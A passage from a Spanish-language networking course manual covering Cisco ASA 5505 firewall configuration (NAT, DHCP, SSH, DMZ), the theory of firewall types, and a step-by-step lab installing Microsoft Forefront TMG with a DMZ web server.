ASA-SENATI(config)#route outside 0.0.0.0 0.0.0.0 209.165.200.225

Configurar el uso de la traducción de direcciones de red PAT:
ASA-SENATI(config)#
ASA-SENATI(config)#object network INSIDE-NET
ASA-SENATI(config-network-object)#subnet 192.168.1.0 255.255.255.0
ASA-SENATI(config-network-object)#nat (inside,outside) dynamic interface
ASA-SENATI(config-network-object)#end
ASA-SENATI#
Configuring DHCP, AAA SSH:

ASA-SENATI(config)#dhcpd address 192.168.1.5-192.168.1.36 inside

ASA-SENATI(config)#dhcpd enable inside
Definir un usuario local llamado admin y especificar una contraseña:
ASA-SENATI(config)# username admin password etisenati
Configurar AAA para usar la base de datos local de ASA para la

autenticación de usuario SSH.
ASA-SENATI(config)#aaa authentication ssh console lOCAL
Configurando DMZ, Static NAT y ACLs:
Configure la DMZ en la interface VLAN 3:
ASA-SENATI(config)# interface vlan 3

ASA-SENATI(config-if)#nameif DMZ
ASA-SENATI(config-if)#no forward interface vlan 1
ASA-SENATI(config-if)#nameif DMZ
ASA-SENATI(config-if)#security-level 70
ASA-SENATI(config-if)#no shutdown
Asignar la interfaz física E0 / 2 del ASA a la VLAN 3 que es en la cual se

encuentra la DMZ y activar la interfaz.
ASA-SENATI(config)#interface Ethernet0/2
Mostrará el estado de todas las interfaces utilizando el comando show

interface IP Brief.
ASA-SENATI#show interface ip brief
Interface IP-Address OK? Method Status Protocol
Ethernet0/0 unassigned YES unset up up

Ethernet0/3 unassigned YES unset down down
Vlan1 192.168.1.1 YES manual up up
ASA-SENATI#
Mostrar la información de capa 3 de las interfaces VLAN:.
ASA-SENATI(config)#show ip address
System IP Addresses:
Interface Name IP address Subnet mask Method
Vlan1 inside 192.168.1.1 255.255.255.0 manual
Vlan2 outside 209.165.200.226 255.255.255.248 manual
Vlan3 DMZ 192.168.2.1 255.255.255.0 manual
Current IP Addresses:
Interface Name IP address Subnet mask Method
Vlan1 inside 192.168.1.1 255.255.255.0 manual
Vlan2 outside 209.165.200.226 255.255.255.248 manual
Vlan3 DMZ 192.168.2.1 255.255.255.0 manual
ASA-SENATI(config)#

ASA-SENATI(config)#show switch vlan
VLAN Name Status Ports

---- -------------------------------- --------- -------------------------------
1 inside up Et0/1, Et0/3, Et0/4, Et0/5
Et0/6, Et0/7
2 outside up Et0/0
3 DMZ up Et0/2
Configurar NAT estática para el servidor DMZ utilizando un objeto de red
ASA-SENATI(config)#object network DMZ-server

ASA-SENATI(config-network-object)#host 192.168.2.3
ASA-SENATI(config-network-object)#nat (dmz,outside) static 209.165.200.227
FUNDAMENTO TEORICO
Operación:
Entender la importancia de los diferentes tipos de firewall para redes
empresariales.
Hace muchos años, cuando recién aparecían las primeras redes de

computadoras, estas eran muy pequeñas, pero luego continuaron creciendo, de
tal forma que se les utilizó para transferir y almacenar datos sensibles para los
usuarios y las empresas, por lo cual fue necesario crear tecnologías de seguridad
más fuertes, lo cual conllevó a la creación del firewall. El término "firewall"
significaba pared a prueba de fuego (fireproof wall), que era elaborada de piedra
o metal, que evitaba que se extendiera el fuego de una estructura a otra. El
mismo concepto se aplica a las redes de datos, los firewalls separan las áreas
protegidas, que contienen información valiosa, de las otras áreas. Esto impide
a los usuarios sin autorización, puedan acceder a los recursos en las redes
protegidas.
Los primeros medios para prestar

este tipo de protección eran las listas
de control de acceso (ACL),
incluyendo los tipos estándar,
extendidas, numeradas y
nombradas. Luego aparecieron
tecnologías de firewall más
avanzadas.

Los primeros firewall que aparecieron fueron los firewalls de estados, estos tipos
de firewall utilizan tablas para seguir el estado de las sesiones end-to-end y estos
registros se realizan en tiempo real. Estos firewall toman en cuenta el tipo de
sesión que genera el tráfico de red.
Actualmente hay muchos tipos de firewalls disponibles, por ejemplo, los firewalls
de estados, de filtrado de paquetes, de gateway de aplicación (proxy), de
traducción de direcciones, transparentes, híbridos, basados en hosts, etc.
Los diseños de redes empresariales actuales requieren el uso de firewalls

cuidadosamente colocados de modo que puedan proteger los recursos más
valiosos de la empresa: “La información”.
En las redes modernas, el firewall de la red debe ubicarse entre la red interna y
la red externa. Se debe bloquear el acceso a determinados tráficos de red salvo
que se lo permita explícitamente por medio de una ACL, o, si se trata de tráfico
de retorno, que el mismo se corresponda con tráfico que se inició dentro de la
red interna. Esta es la tarea fundamental de un firewall de red, ya sea un
dispositivo de hardware dedicado o un router con un IOS firewall.
El firewall aplica políticas de control de acceso entre diversas redes.
Según lo indicado en el CCNA Security, los firewalls tienen las siguientes

propiedades comunes:
 Resistencia ante los ataques.

 Son el único punto de tránsito entre las redes (todo el tráfico fluye a través
del firewall de red).
 Aplican políticas de control de acceso a las diferentes redes en una
organización.
Tipos de Firewalls
Existen varios tipos de firewalls de filtrado, siendo los más comunes:
Firewall de filtrado de paquetes: Comúnmente se trata de un router con la

capacidad de filtrar paquetes con un determinado tipo de contenido, como
información de la capa 3 del modelo OSI.
El firewall de paquetes en algunos casos también puede trabajar con información

de la capa de transporte, como protocolos y números de puerto de origen y
puerto destino.

Firewall con estados: Este firewall permite monitorear el estado de las

conexiones, las cuales pueden estar en estado de iniciación, transferencia de
datos o terminación.
Firewall gateway de aplicación: Este tipo de firewall logra filtrar según la

información de las capas 3, 4, 5 y 7 del modelo OSI.
Firewall de traducción de direcciones: Aumenta el número de direcciones lógicas

(direcciones IP) disponibles.

También existen otros tipos de firewall básicos, tales como: firewall basado en
hosts, firewall transparente, firewall híbrido.
Debemos tener en cuenta que el uso de los firewall solo es parte de la seguridad,
ya que debemos utilizar más herramientas, como por ejemplo:
 Implementar una política de seguridad.

 Controlar el acceso físico a la información.
 Instalar los parches y actualizaciones de los sistemas y aplicaciones.
 Proteger con contraseña los datos sensibles.
 Uso de antivirus, etc.
También podemos clasificar a los firewall por software y por hardware.
Firewall por Software:
En este tipo de firewall, podemos identificar dos clases: el primero es gratuito,

además se le conoce con el nombre de software firewall, que puede ser
empleado sin costo alguno e inclusive algunos vienen ya incorporados en los
sistemas operativos. Su fin es evitar el acceso de cierta clase de información a
las computadoras personales.
Existen también los firewalls comerciales. Estos sistemas de software cuentan

con similar funcionamiento que los firewall gratuitos, pero además se les agrega
superiores niveles de control y protección. En la mayoría de casos, son
comercializadas con otros sistemas de seguridad como antivirus, para que
generen mayor protección.
Existen aún algunos firewall de software que son utilizados para asegurar una
red, como por ejemplo:
 Por el lado de Microsoft, tenemos:

o La familia de productos Forefront (actualmente la mayoría están
descontinuados).

o System Center 2012 R2 Configuration Manager and Endpoint

Protection SP1. (para descargar una versión de prueba puede
acceder al enlace:
https://www.microsoft.com/en-us/evalcenter/evaluate-system-
center-2012-r2-configuration-manager-and-endpoint-protection
 Por el lado de Linux:

o SmoothWall Express.
o Iptables con Gufw.
o Netfilter.
o Etc…
Firewall por hardware:
Los cortafuegos por hardware, son dispositivos específicos instalados en una red
para brindar una defensa y protección óptima.
Los Firewalls que tienen mayor costo son los filtros Hardware, que producen una
conmutación más rápida que un firewall por software que corre en un equipo con
un hardware común (el Hardware de los “Firewall por Hardware” esta optimizado
para esas tareas), y además proporcionan un nivel de seguridad alto, pudiéndose
actualizar constantemente y así lograr mejoras. Los nuevos tipos de ataques
cada vez más sofisticados han provocado que las soluciones de seguridad
perimetral mejoren y evolucionen siendo una de estas mejoras los UTM (Unified
Threat Management o en español “Gestión unificada de amenazas”).

Un UTM se refiere a un producto de seguridad integral que incluye varios tipos

de protección. Un producto UTM normalmente incluye en la actualidad un
firewall, software antivirus, filtrado de contenidos y un filtro de spam, todo
integrado.
Los más importantes proveedores de UTM son: Fortinet, Palo Alto, Sophos,
Secure Computing Corporation, Symantec, etc.
Las principales ventajas de la UTM son la sencillez, la instalación y el uso

racionalizado, y la capacidad de actualizar todas las funciones de seguridad o
programas simultáneamente.
Han surgido dispositivos de Cisco que

permiten mayor nivel de protección, estas
soluciones son: el ISR con habilitación de
firewall y el Cisco Adaptive Security
Appliance (ASA).
Un ASA proporciona una solución de

firewall muy completa. Un ejemplo es el
Cisco serie ASA 5500. Este dispositivo
entrega una escalabilidad superior, un
amplio rango soluciones tecnológicas.
Cuando deseamos brindar seguridad a pequeñas sucursales, una posible

solución sería colocar un router firewall, pero esto no sería útil para una empresa
de gran tamaño.
En el curso CCNA Security se detallan algunas características de los

dispositivos de seguridad que cuentan con ASA.
Existen por el momento, seis modelos de ASA, que van desde el modelo 5505
utilizado con pequeñas sedes, hasta la versión 5585 para Data Center. Todos
proporcionan funciones de firewall stateful y funcionalidad VPN.

Los dispositivos Cisco ASA son escalares para satisfacer una serie de requisitos
y tamaños de red. La elección del modelo ASA dependerá de las necesidades
de la organización. El software ASA combina firewall, concentrador VPN, y la
funcionalidad de prevención de intrusiones.
Entre las funciones de ASA tenemos:
1. Virtualización ASA.
2. Dos ASA idénticas pueden estar vinculados a una configuración de
conmutación por error de tal forma que uno este activo y el otro en espera
para proporcionar redundancia.
3. El ASA utiliza Active Directory con lo cual puede recuperar la información
de identidad del usuario actual.
4. ASA posee control de amenazas y servicios de contención.
5. Todos los modelos de ASA se pueden configurar y administrar mediante
la interfaz de línea de comandos (CLI) o el Administrador de dispositivos
de seguridad adaptable (ASDM) que consiste en un navegador creado en
Java.
Hay dos modos de funcionamiento del cortafuego disponible en los dispositivos

ASA:
1. Modo Enrutado: es el modo tradicional para la implementación de un

servidor de seguridad, donde hay dos o más interfaces que separan redes
de Capa 3.
2. Modo Transparente: En este modo, el ASA no es considerado un salto
router. Similar a un conmutador de capa 2, el ASA sólo requiere una
dirección IP de administración configurado en el modo de configuración
global.
Configuración Básica del CISCO ASA:
Primero empezaremos con una breve descripción de este firewall.
El Cisco ASA 5505 es un dispositivo que brinda un importante nivel de seguridad

para pequeñas empresas, oficinas y entornos empresariales. Es un firewall que
soporta SSL VPN, IPSec VPN y servicios de calidad de red en un sistema
modular.

En el panel frontal del ASA 5505 podemos encontrar los siguientes elementos
(empezando desde el lado izquierdo al derecho):
1. Puerto USB - Reservado para uso futuro.

2. LEDs indicadores de Velocidad y LEDs indicadores de enlace y actividad.
3. Power LED: Es de color Verde e indica que el aparato está encendido.
4. LED de estado: Es de color Verde y se muestra intermitente, indicando
que el sistema está arrancando y las pruebas de encendido se ejecutan,
Toma un color ámbar sólido cuando las pruebas de arranque fallan.
5. LED activo: Indica que el Firewall ASA Cisco está activo.
6. VPN LED: Este LED es de color Verde fijo e indica que uno o más túneles
VPN están activos.
7. LED SSC: Este LED Verde fijo indica que una tarjeta SSC (Servicios de
seguridad de la tarjeta) está presente.

La parte posterior de los Cisco ASA 5505 tienen las siguientes características:
1. Conector de energía que trabaja a 48 VDC.

2. Un Switch de 8 puertos RJ-45 que pueden transmitir a las velocidades
10/100 Fast Ethernet (10 Mbps/ 100 Mbps). Los puertos 6 y 7 trabajan con
la tecnología PoE (Energía sobre Ethernet) para simplificar el uso de los
teléfonos, cámaras y Access point.
3. Dos puertos USB de tecnologías USB 2.0.

4. Un slot SSC para agregar una tarjeta AIP-SSC (Cisco Advanced
Inspección- SSC). La tarjeta de AIP-SSC permite que el Cisco ASA
proporcione servicios de prevención de intrusiones para detener el tráfico
malicioso antes de que pueda afectar a una red.
5. La memoria DRAM por defecto es de 256 MB (ampliable a 512 MB) y
memoria flash interna por defecto es de 128 MB para el Cisco ASA 5505.
6. Puerto serial de consola para configuración.
7. Ranura de bloqueo para seguridad.
8. Botón de reseteo.
El ASA define diversos niveles de seguridad para distinguir entre redes internas
y externas. Los niveles de seguridad ayudan a definir el nivel de confiabilidad de
las interfaces. Cuanto más alto sea el nivel, más confianza se tendrá en la
interfaz. Los números que sirven para definir el nivel de seguridad oscilan entre
0 (no fiable) a 100 (muy fiable). Cada interfaz para operar debe tener un
determinado nombre y un nivel de seguridad asignado.
Cuando el tráfico se mueve de una interfaz con un nivel de seguridad alto a una
interfaz con un nivel de seguridad bajo, se considera tráfico de salida, el tráfico
en sentido contrario es denominado: tráfico entrante.
Los niveles de seguridad ayudan a controlar los accesos a la red.

El ASA 5505 tiene ocho puertos integrados de conmutación de capa 2, y por lo

tanto no se pueden asignar direcciones IP directamente.
En el ASA los parámetros de capa 3 se configuran en una interfaz de conmutador

virtual (SVI). El SVI requiere un nombre, nivel de interfaz de seguridad y la
dirección IP. A los puertos del switch de capa 2 se les asigna una VLAN
específica y como sabemos, los puertos del switch que pertenecen a la misma
VLAN pueden comunicarse entre sí.
En una pequeña empresa, el ASA 5505 puede colocarse en la infraestructura de

red creando las siguientes VLAN: La red interior puede estar en la VLAN 1 para
conectar las estaciones de trabajo, las cámaras IP y los teléfonos IP, una VLAN
DMZ para conectar un servidor web de la compañía. La interfaz exterior puede
estar conectada a una VLAN 2 que se utilizaría para conectarse a Internet.

Para el caso en que se implemente una infraestructura más grande (una

empresa mediana o grande), el ASA 5505 puede ser utilizado por los usuarios
para conectarse a una ubicación centralizada mediante una red privada virtual
(VPN) ya sea desde otras sucursales o sus hogares.
Existen otros equipos Cisco ASA, como por ejemplo, el ASA 5510, 5520, 5540,
5550, 5580. Cada uno de estos tiene ranuras de expansión para módulos de
servicios de seguridad.

Configuración del Firewall ASA
El Firewall ASA puede ser configurado y administrado mediante la interfaz de

línea de comandos (CLI) o una interfaz gráfica denominada (ASDM). Hay una
diversidad de comandos que se utilizan en el firewall ASA y que son muy
similares a los que son utilizados en los IOS de los routers Cisco.
El Cisco ASA ofrece los siguientes modos de acceso:
Modo User EXEC: ciscoasa>
Modo Privilegiado EXEC:
ciscoasa# config t
Modo de configuración global:
ciscoasa (config) #
Existen varios sub-modos de configuración:
Por ejemplo:
ciscoasa (config-if) # ROMMON
ROMMON>
En el modo ROMMON, se puede utilizar un servidor TFTP para cargar una

imagen del sistema en el dispositivo de seguridad. Además, este modo
ROMMON también se utiliza para recuperar la contraseña del sistema.
El ASA 5505 viene con una configuración por defecto que incluye dos redes
VLAN: VLAN1 y VLAN2. VLAN 1 es para la red interior y la VLAN 2 es para la
red exterior.
La interfaz también proporciona direccionamiento DHCP y funciones NAT. Los

clientes de la red interna pueden obtener una dirección IP dinámica del firewall
ASA para que puedan comunicarse entre sí y con los dispositivos en Internet.
En concreto, la configuración predeterminada que viene de fábrica para el ASA

5505 contiene lo siguiente:
 Un nombre de host predeterminado, el cual es: ciscoasa.

 Consola habilitada con contraseñas en blanco.

 En la interfaz VLAN 1 incluye el Ethernet 0/1 hasta el Ethernet 0/7 del
switch.
 La VLAN 1 tiene la dirección IP 192.168.1.1 y la máscara 255.255.255.0.
 La red externa es la VLAN 2 que incluye la interface Ethernet 0/0 del
Switch. La VLAN 2 obtiene su dirección IP desde el ISP mediante DHCP.
Todas las direcciones IP en la red interior se traducen hacia la red exterior
a través del PAT (Traducción de direcciones de puerto).
 El servicio HTTP para apoyar el acceso vía ASDM (Adaptive Security
Device Manager).
 Un servidor interno DHCP para proporcionar direcciones IP entre
192.168.1.5 y 192.168.1.36 para los hosts que se conectan a la interfaz
VLAN 1.
Para empezar, si existiera una configuración anterior en el CISCO ASA, se

pueden borrar usando los comandos write erase y reload.
Una vez que el equipo ha sido reiniciado, se muestra el siguiente mensaje "Pre-
configure Firewall now through interactive prompts [yes]?"

Al ingresar “No” se cancela el asistente de inicialización y el ASA mostrará su

carga por defecto.
Si se colocaba yes o simplemente se pulsaba “enter”, el ASA guiará

interactivamente a un administrador para configurar los siguientes elementos:
 Modo Firewall.
 Habilitar contraseña.
 Habilitar la recuperación de contraseñas.
 Hora y fecha.
 Dirección IP y máscara Interna.
 Nombre de host.
 Nombre del dominio.

El dispositivo ASA muestra los valores predeterminados entre corchetes ([])

antes de preguntar al usuario si desea aceptar o cambiarlos. Para aceptar la
entrada predeterminada simplemente se pulsa “Enter”.
Configurando los ajustes de gestiones y servicios
Configuración de los parámetros básicos:
Los ajustes básicos de administración se configuran en el modo de configuración

global.
En el modo de configuración global, se pueden configurar opciones básicas

como por ejemplo, el nombre de host del ASA, el nombre del dominio y la
contraseña del modo EXEC privilegiado, utilizando los siguientes comandos:
 Hostname <<nombre>>: Cambia el nombre del CISCO ASA.

 Domain-name <<nombre>>: Cambia el nombre de dominio.
 Enable password <<contraseña>>: Configura la contraseña para el modo
EXEC privilegiado.
 Passwd <<contraseña>>: Configura la contraseña para Telnet y SSH.

Configurar las interfaces
A continuación, las interfaces deben ser configuradas. Recordemos que el ASA

5505 tiene 8 puertos de conmutación de capa 2. Por lo tanto, dos tipos de
interfaces se deben configurar: la lógica de la interfaz VLAN que también se
conoce como un conmutador de interfaz virtual (SVI), y los puertos que están
asignados a las VLAN.
Utilicemos los siguientes comandos para configurar la lógica de la interfaz VLAN:
 Interface vlan vlan-number: Crea un conmutador virtual de interfaz (SVI).

 Nameif name: Asigna un nombre a la interfaz de SVI.
 Security-level value: Asigna un nivel de seguridad para la interfaz de SVI.
Por defecto los valores del nivel de seguridad se asignan a la interfaz interna y
externa. Por lo tanto, el comando security-level sólo es necesaria si el
administrador decide cambiar esos valores. Para cualquier otra interfaz debe ser
asignado un valor de nivel de seguridad.
La dirección IP de una interfaz se puede configurar con tres opciones:
 Configuración estática(configuración manual).

 Uso de DHCP
 Usando PPPoE
Configurar manualmente una dirección IP
Para realizar la configuración IP en forma estática, utilice el siguiente comando:

ip address ip-address netmask - Comando para asignar una dirección IP y la
máscara de la SVI.
Si la interfaz del firewall ASA se conecta a un dispositivo que le brinda

direcciones dinámicas vía DHCP, la interfaz puede ser un cliente DHCP y puede
recibir una configuración IP utilizando el siguiente comando: ip address dhcp.

Configuraciones y Comandos básicos utilizados en el Firewall ASA:
Paso 1: Configurar la interfaz interna VLAN:
ASA5505(config)# interface Vlan 1
ASA5505(config-if)# nameif inside
ASA5505(config-if)# security-level 100
ASA5505(config-if)# ip address 192.168.1.1 255.255.255.0
ASA5505(config-if)# no shut
Paso 2: Configure la interfaz de VLAN externo (conectado a Internet)
ASA5505(config)# interface Vlan 2
ASA5505(config-if)# nameif outside
ASA5505(config-if)# security-level 0
ASA5505(config-if)# ip address 200.200.200.1 255.255.255.0
Paso 3: Asignar Ethernet 0/0 a la VLAN 2
ASA5505(config)# interface Ethernet0/0
ASA5505(config-if)# switchport access vlan 2
Paso 4: habilitar las interfaces

Paso 5: Configurar PAT en la interfaz externa
ASA5505(config)# global (outside) 1 interface
ASA5505(config)# nat (inside) 1 0.0.0.0 0.0.0.0
OBSERVACIÒN:
A partir de marzo de 2010, Cisco anunció la nueva versión del software Cisco
ASA 8.3. Esta versión introdujo varios cambios de configuración importantes,
sobre todo en el mecanismo de NAT / PAT. El comando "global" ya no es
compatible con NAT (estática y dinámica) y PAT se configuran en Objetos de
red. La configuración de PAT para ASA 8.3 y posterior es:
object network obj_any
subnet 0.0.0.0 0.0.0.0
nat (inside,outside) dynamic interface
Paso 6: Configurar ruta por defecto
La ruta por defecto hacia el ISP (asumiremos que la puerta de enlace

predeterminada es 200.200.200.2)

ASA5505(config)# route outside 0.0.0.0 0.0.0.0 200.200.200.2 1
Los pasos anteriores son absolutamente necesarios pero hay muchos más
detalles de configuración para mejorar la seguridad y la funcionalidad tales como
las listas de control de acceso, NAT estática, DHCP, zonas DMZ, autenticación,
etc.
Al configurar un CISCO
ASA, se pueden recurrir a
diferentes comandos que
son ingresados desde
una CLI (Interfaz de línea
de comandos) pero
también se pueden
realizar las
configuraciones
utilizando una GUI, que
en este caso es el ASDM.
1. ¿Cuáles son las ventajas de contar con un firewall en la empresa?-

Explique.
2. ¿Cuál es el funcionamiento básico de un firewall? – Explique al detalle.
3. ¿Qué tipos de firewall conoce?
4. Sabemos que nuestra información puede ser robada desde nuestra PC
en casa o en la empresa ¿Qué opina al respecto y que solución puede
tomarse?.


TAREA
04
Tarea 04: Realizar una descripción general de los productos firewall de
Microsoft e instalar los más utilizados.
En esta tarea realizará la siguiente Operación:
Introducción a los diferentes productos Proxy/firewall que ofrece

Microsoft.
Despliegue de Escenarios para el proxy / firewall de Microsoft.
Instalando el proxy/ firewall para redes de datos de Microsoft.
Instalando y configurando los equipos Clientes del Firewall.
“El éxito de la vida no está en vencer siempre, sino en no desanimarse nunca.”

Anónimo
 Computadora con microprocesadores core 2 Duo ó de mayor capacidad

con conexión inalámbrica.
 Sistema operativo Windows 7 ó equivalente.
 Access Point.
 Introducción a los diferentes productos Proxy/firewall que ofrece Microsoft.

 Despliegue de Escenarios para el proxy / firewall de Microsoft.
 Instalando el proxy/ firewall para redes de datos de Microsoft.
 Instalando y configurando los equipos Clientes del Firewall.
TAREA PRÁCTICA:
Instalando el proxy/ firewall para redes de datos de Microsoft Forefront
TMG y configurar los equipos Clientes del Firewall:
Forefront TMG:
Para esta tarea, debe contar con las siguientes máquinas virtuales:
1. Servidor WEB con Windows Server 2012R2, 2012 o 2008 para la DMZ.
2. Servidor con Windows Server 2008R2 que será el Proxy/Firewall con
Forefront TMG.
3. Un equipo cliente con Windows 8 ó Windows 10.
La topología para este ejercicio es:
Instalará el servidor Proxy/Firewall, teniendo en cuenta los siguientes

pasos:
 Se instalará el sistema: Windows Server 2008 R2.

 Se tendrán tres tarjetas de red, una para la red Interna, una para la red
externa y otra para la DMZ.

RED Interna:
172.31.2.0/23, Gateway: 172.31.2.1/23.
DNS:
200.48.225.130
200.48.225.146
RED DMZ:
IP del servidor: 192.168.5.2/24
Servicios: WEB.
Gateway : 192.168.5.1/24
RED Externa: (INTERNET)

192.168.1.0/24
Gateway: 192.168.1.0
DNS:
200.48.225.130
200.48.225.146
En otros entornos, se podría trabajar directamente con los Ips públicos,
esto dependerá de las características de la red.
Si se trabaja en VirtualBox, la red Externa, tendrá la configuración de la

interfaz de red en “Adaptador puente”, la red Interna y DMZ en “Red
Interna”.
 Se instalará Forefront TMG.
Realizará el siguiente procedimiento:
1. Preparará la máquina virtual, utilizando el mismo programa de

virtualización utilizado al crear el controlador de dominio.
2. Creará las tres tarjetas de red virtuales y colocará el instalador de
Windows server 2008 r2 en la lectora virtual.
3. Escogerá la versión adecuada del sistema:

4. Aceptará los términos de licencia:
5. Creará la tabla de particiones:
6. Se iniciará la copia de los archivos y luego la instalación del sistema:
Inicia el proceso de
instalación del sistema
operativo.
7. Colocará la contraseña del sistema:

8. Cambiará el nombre del servidor y realizará la configuración de los IP’s

de las redes como se indicó al inicio:
Se ingresarán las
configuraciones de
red de la RED
INTERNA y RED
EXTERNA

9. Ahora, colocará el iso del instalador de Forefront TMG en la lectora

virtual del servidor.
10. Ahora visualizará el Instalador.
Ejecutará el archivo
“Autorun”
11. Ejecutará el archivo de instalación, para lo cual ejecutará el archivo

“Autorun”.
12. Se mostrará la siguiente ventana:

13. Ejecute la herramienta de preparación.
14. Escogerá el tipo de instalación que se realizará:
15. Se inicia la preparación del sistema:
Esta herramienta preparará

el sistema para la
instalación del TMG.
16. Se mostrará un aviso indicando que la preparación esta completada:
17. Ahora hará clic en “Ejecutar el asistente para instalación”.

18. Se inicia el asistente para la instalación de Forefront:
19. Se aceptan los términos de licencia.

20. Se ingresará la serie del producto.
21. Instalará el escenario de instalación:
Instalar Servicios y administración de Forefront TMG.
22. Indicará la ruta de acceso de instalación.
Indicará la ruta de
Instalación.
23. Se le indicará el nombre de la red Interna:

Escogerá la red Interna

o red LAN que se debe
proteger.
24. Se instalarán las características:
Se instalarán las
características del
TMG.
25. Terminada la instalación, aparecerá un asistente de introducción:

26. Escogerá la plantilla “Perímetro de tres secciones”:
27. Indicará cual es la red LAN (red interna):
En la red
interna no se
coloca la
puerta de
enlace.
28. Indicará cual es la red conectada a Internet:
29. Ahora, se solicitará la red perimetral, en este caso se escogerá la red

DMZ pero privada:

Se ingresará la
configuración de red de
la RED DMZ.
30. Ahora realizará la configuración de las opciones del sistema:
31. Debe configurar el sistema como parte de un grupo de trabajo (se podría
utilizar un dominio, pero para esto se debe tener un controlador de
dominio en la RED):
32. En la opción “Definir opciones de implementación”, le indicará que no

desea utilizar el servicio Microsoft Update.
33. Las demás opciones las dejará por defecto.

34. No agregará la opción de comentarios de usuario:

35. Finalizará este asistente.

36. Hará clic en cerrar, pero activando la opción “Ejecutar el asistente para
acceso WEB”:
37. En el asistente para acceso web, marcará una regla por defecto para
evitar el acceso web a URLs malintencionadas:
Los filtros por URL son mas

sencillos, ya que los URL se
encuentran categorizadas.
38. No activara la inspección de malware, ya que esto puede hacer lentos

los accesos:

39. Debe configurar la cache del servidor:
40. Por el lado del servidor TMG, ya se tiene instalado y está con las
configuraciones más básicas, ahora deberá instalar el equipo cliente, que
en este caso contará con un sistema operativo: Windows 8.1 de 64 bits.
41. Realizará la instalación y configuración básica del sistema Windows 8.1.
42. Creará un usuario en el sistema:
43. La configuración de red debe ser

“Red Interna” y con un IP
perteneciente a la “Red Interna”.
IP: 172.31.2.40/23
Gateway: 172.31.0.1
DNS:
200.48.225.130
200.48.225.146
44. Realizará la configuración de la dirección del proxy en el navegador.

IP: 172.31.2.1, puerto: 8080
45. Debe verificar que el equipo cliente pueda navegar en Internet:
46. Ahora preparará el servidor WEB de la DMZ, que tendrá un sistema

operativo Windows Server 2008 R2, con IIS:
IP del servidor: 192.168.5.2/24

Servicios: WEB.
Gateway : 192.168.5.1/24
47. Instalará el IIS y creará un sitio WEB para las pruebas.

48. Verificará conectividad entre el servidor WEB de la red DMZ y el servidor

TMG, para lo cual se debe crear una nueva regla de acceso en el TMG
para que se permita el uso del comando ping:
49. Asignará un nombre a la nueva regla:
50. Es una regla de tipo “Permitir”:

51. Agregará el protocolo PING, de la red perimetral (DMZ) a Host Local:
52. Ahora, debe probar conectividad:
Debe establecerse
comunicación.
53. Ahora, creará una regla de acceso de la red Interna (LAN) a la red
perimetral (DMZ) para que desde la red LAN puedan navegar en el
servidor de la DMZ:

54. Desde el equipo cliente de la LAN, podrá navegar en el servidor WEB de

la DMZ:
55. Ahora, publicará el servidor WEB

ubicado en la DMZ para que
pueda ser visto desde Internet:
56. Hará clic en Tareas, luego en
“Publicar sitios WEB”:
57. Asignará un nombre a esta regla:

58. Seleccionará la acción de la regla, que en este caso será: “Permitir”:
59. Escogerá el tipo de publicación:
60. La seguridad de conexión de servidor, en esta ocasión la definirá con la

opción mostrada en la imagen:

61. Indicará los detalles internos de la publicación:
62. En la siguiente ventana se dejan las configuraciones por defecto.

63. Indicará que se acepte cualquier nombre de dominio.

64. Ahora creará una nueva “Escucha WEB” y le asignará un nombre:
65. Por ahora indicará que no es necesaria la conexión segura utilizando SSL.
66. Indicará que se hará la escucha WEB de solicitudes WEB entrantes en
la red Externa.

67. Para el acceso no se requerirá autenticación:
68. Luego se mostrará la información ingresada:
69. La delegación de la autenticación será:

Sin delegación, pero el cliente se puede autenticar directamente:
70. Ahora, se ubicará en la directiva de firewall recién creada, en la ficha

“Escucha”.
71. Hará clic en “Propiedades”:

72. Luego seleccione la casilla de verificación “Permitir la autenticación de

cliente a través de HTTP.
73. Ahora, comprobará que desde una PC con la dirección IP de la red

Externa (Internet) podrá acceder al servidor WEB DMZ:

FUNDAMENTO TEÓRICO
Introducción a los diferentes productos Proxy/firewall que
ofrece Microsoft.
La mayoría de productos firewall de Windows están descontinuados, parece ser
que Microsoft no quiere ingresar por ahora al tema de seguridad utilizado
Firewalls.
Entre los productos para Firewall de Microsoft, tenemos:
1. Familia de productos Forefront:
a. Forefront Protection 2010 for Exchange Server (FPE)
Microsoft Forefront Protection 2010 para Exchange Server

proporcionaba una importante protección contra el malware y el
correo no deseado, ofrece a los clientes una consola de
administración sencilla con opciones de configuración que admiten
opciones de filtrado, características de supervisión e informes y
protección contra correo no deseado.
b. Forefront Protection 2010 for SharePoint (FPSP)

Microsoft Forefront Protection 2010 para SharePoint (FPSP) ayuda
a reducir los problemas de seguridad de la empresa y evita el robo
de datos al negar el acceso a los documentos que no cumplan con
las políticas de seguridad, la información confidencial, lenguaje
inapropiado, y el malware. FPSP proporciona a los clientes una
consola de administración fácil de usar que incluye ajustes
personalizables de configuración, opciones de filtrado, y funciones
de supervisión e informes.

c. Forefront Security for Office Communications Server (FSOCS)

Microsoft Forefront Security para Office Communications Server
(FSOCS) proporciona una protección rápida y eficaz contra el
malware basado en mensajería instantánea. El motor antimalware
de múltiples capas proporciona una protección completa contra las
amenazas más recientes, mientras que las tecnologías de archivos
y filtrado de palabras clave impiden el intercambio de archivos fuera
de la política de seguridad, la información confidencial corporativa
no autorizada o lenguaje ofensivo en conversaciones de
mensajería instantánea.
d. Forefront Threat Management Gateway 2010 (TMG)

Forefront Threat Management Gateway 2010 permite a los
empleados que utilizan continuamente Internet en la empresa, que
lo hagan de forma segura y productiva, sin tener que preocuparse
del malware ni de otras amenazas que están presentes en la red e

Internet. Proporciona numerosas funciones de protección entre las

que se incluyen el filtrado de direcciones URL, inspección del
malware, prevención de intrusiones, firewall de nivel de aplicación
y nivel de red e inspección HTTP/HTTPS, que se integran en una
puerta de enlace unificada.
e. Forefront Threat Management Gateway Web Protection Services

(TMG WPS)
Con capacidades de filtrado de URL integrado, los administradores

del firewall de TMG ahora tienen la capacidad de aplicar los
controles de acceso basados en reputación al tráfico basado en la
web. El filtrado de URL es la primera línea de defensa en una
moderna puerta de enlace web segura.
Actualmente el TMG 2010 cuenta con una Fecha de fin del soporte técnico
extendido hasta el 14 de abril de 2020.
Forefront TMG permite otorgar a la empresa una seguridad perimetral unificada
con firewall integrado, VPN, prevención de intrusiones, inspección de malware y
filtrado de URL.

Despliegue de Escenarios para el proxy / firewall de Microsoft.

Tiene a su disposición las siguientes topologías de red de Forefront TMG:
 Firewall perimetral: En esta topología, Forefront TMG se encuentra en el

perímetro de la red, donde actúa como firewall perimetral de la
organización, y está conectado a dos redes: la red interna y la red externa
(normalmente, Internet).
 Perímetro de 3 secciones: En esta topología se implementa una red

perimetral. Forefront TMG está conectado por lo menos a tres redes
físicas: la red interna, una o más redes perimetrales, y la red externa.
 Firewall posterior: En esta topología, Forefront TMG se encuentra en el

